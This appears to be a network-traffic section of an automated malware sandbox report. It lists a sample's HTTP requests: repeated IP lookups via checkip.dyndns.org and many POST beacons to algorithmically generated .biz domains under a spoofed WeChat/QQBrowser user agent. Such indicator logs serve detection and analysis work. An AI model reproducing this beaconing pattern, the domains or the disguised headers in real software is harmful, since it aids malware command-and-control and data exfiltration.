Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /bxahccuchxrahyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /ncuqcjjolokpyly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /teksk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /lofudptspdtjqfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /r?usid=27&utid=12022892926 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /ryyftbrdpkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: GET /ryyftbrdpkr?usid=27&utid=12022893059 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /tmcvwhhegsrpvx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /qcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /hshovhcucqxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /ovyjaq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: anpmnmxo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /kt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /ikcoxctprhexiycp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: anpmnmxo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET /ovyjaq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
Source: global traffic	HTTP traffic detected: GET /ikcoxctprhexiycp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /wcdojufdhlu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /aivpwrjbclkvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /paucmhg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /ccoms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET /ccoms?usid=27&utid=12022910001 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /qvxayygldfupog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET /qvxayygldfupog?usid=27&utid=12022910102 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /nutfddbswjlvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /atx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /svryymrfcmvdey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /gibsr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /oqljmnqcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /uanvewavsjdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /tcyrkgcmm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /xjywxpjxp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /hfdtfkpjtuyhlnko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /wjuw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /ae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: GET /wjuw?usid=27&utid=12022910910 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic	HTTP traffic detected: POST /whnyjpnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /tnbemtj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /idmrbxil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /wpmmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /nutsjjvailxyuusu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /pfqnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /bspmtahkiicexhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /dpyks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /mgdeqwhhvaxxpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /oxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /pwmdxj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /kuokeaklav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /cgdwvsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /qedsmvjfmtlscamg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /xwff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /pawvnqqcihuodvw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
